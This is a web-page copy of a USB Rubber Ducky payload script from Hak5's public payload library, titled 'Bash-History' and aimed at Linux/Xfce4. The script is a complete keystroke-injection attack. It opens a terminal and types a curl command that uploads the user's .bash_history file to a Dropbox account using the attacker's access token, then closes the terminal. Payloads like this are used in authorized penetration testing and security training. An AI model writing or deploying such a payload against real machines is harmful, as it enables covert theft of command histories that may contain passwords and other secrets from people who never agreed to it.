Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/Bash-History/payload.txt
2968 views
1
REM Title: Bash-History

2
REM Author: Zoe Ronen

3
REM Description: This payload is meant to exfiltrate bash history to a dropbox

4
REM Target: Linux/Xfce4

5


6
REM replace the [DROPBOX_ACCESS_TOKEN] placeholder with your actual Dropbox access token

7
DEFINE #API_TOKEN [DROPBOX_ACCESS_TOKEN]

8


9
DELAY 500

10
ALT-F2

11
DELAY 500

12
STRING xfce4-terminal

13
DELAY 500

14
ENTER

15
DELAY 500

16
STRING curl -X POST https://content.dropboxapi.com/2/files/upload

17
SPACE

18
STRING --header "Authorization: Bearer

19
SPACE

20
STRING #API_TOKEN

21
STRING " --header "Dropbox-API-Arg: {\"path\": \"/home/$USER/.bash_history\"}"

22
SPACE

23
STRING --header "Content-Type: application/octet-stream" --data-binary @.bash_history

24
DELAY 500

25
ENTER

26
DELAY 500

27
STRING exit

28
DELAY 500

29
ENTER

30


31